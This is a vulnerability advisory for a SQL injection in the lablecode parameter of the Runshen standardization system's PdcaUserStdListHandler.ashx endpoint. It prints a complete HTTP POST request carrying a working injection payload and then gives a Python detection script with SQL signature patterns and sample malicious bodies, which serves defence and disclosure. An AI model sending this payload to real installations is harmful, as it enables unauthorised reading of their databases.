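Vulnerability description
The PdcaUserStdListHandler.ashx endpoint of the Runshen Information Enterprise Standardization Management System (润申信息企业标准化管理系统) has a SQL injection vulnerability. The lablecode parameter is injectable: the value passed in is not strictly validated, which leads to SQL injection.
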
POST /PDCA/ashx/PdcaUserStdListHandler.ashx?action=GetDataBy HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 232
Connection: close

code=1&lablecode=-9458%29+OR+5511+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28112%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%285511%3D5511%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28107%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29--+XeuQ&LableName=&page=1&rows=20
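
A detection check for this request shape, as an added example that is not part of the original advisory or the vendor's code: it URL-decodes form bodies sent to the handler and flags lablecode values containing SQL constructs like those in the request above. The signature set, the function names and the sample requests are constructed assumptions, and the rules are not exhaustive.

```python
import re
from urllib.parse import parse_qs

# Endpoint and parameter named in the advisory above.
HANDLER_PATH = "/PDCA/ashx/PdcaUserStdListHandler.ashx"
WATCHED_PARAM = "lablecode"

# Assumed rule set modelled on the request shown above; tune before production use.
SIGNATURES = {
    "subquery": re.compile(r"\(\s*select\b", re.I),
    "char_concat": re.compile(r"char\s*\(\s*\d+\s*\)\s*\+", re.I),
    "case_when": re.compile(r"\bcase\s+when\b", re.I),
    "boolean_or_and": re.compile(r"\)\s*(or|and)\s+\d+", re.I),
    "trailing_comment": re.compile(r"--\s"),
}

def inspect_body(body):
    """Return sorted signature names hit by lablecode in a form-encoded body."""
    # parse_qs percent-decodes values and turns '+' into a space.
    params = parse_qs(body, keep_blank_values=True)
    hits = set()
    for value in params.get(WATCHED_PARAM, []):
        hits.update(n for n, rx in SIGNATURES.items() if rx.search(value))
    return sorted(hits)

def scan(requests):
    """Return (index, hits) for handler requests whose lablecode looks like SQL."""
    flagged = []
    for i, (path, body) in enumerate(requests):
        if not path.lower().startswith(HANDLER_PATH.lower()):
            continue  # only this handler is in scope for the rule
        hits = inspect_body(body)
        if hits:
            flagged.append((i, hits))
    return flagged

# Constructed sample records (path, body); not captured traffic.
SAMPLE_REQUESTS = [
    (HANDLER_PATH + "?action=GetDataBy",
     "code=1&lablecode=A-01&LableName=&page=1&rows=20"),
    (HANDLER_PATH + "?action=GetDataBy",
     "code=1&lablecode=-1%29+OR+7+IN+%28SELECT+%28CHAR%2865%29%2BCHAR%2866%29%29%29--+x"
     "&LableName=&page=1&rows=20"),
    ("/other/page.ashx", "lablecode=-1%29+OR+7+IN+%28SELECT+1%29--+x"),
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_REQUESTS):
        print(f"request {index}: suspicious lablecode ({', '.join(hits)})")
```

Detection of this kind complements, and does not replace, fixing the handler so that lablecode is bound as a query parameter and validated server-side.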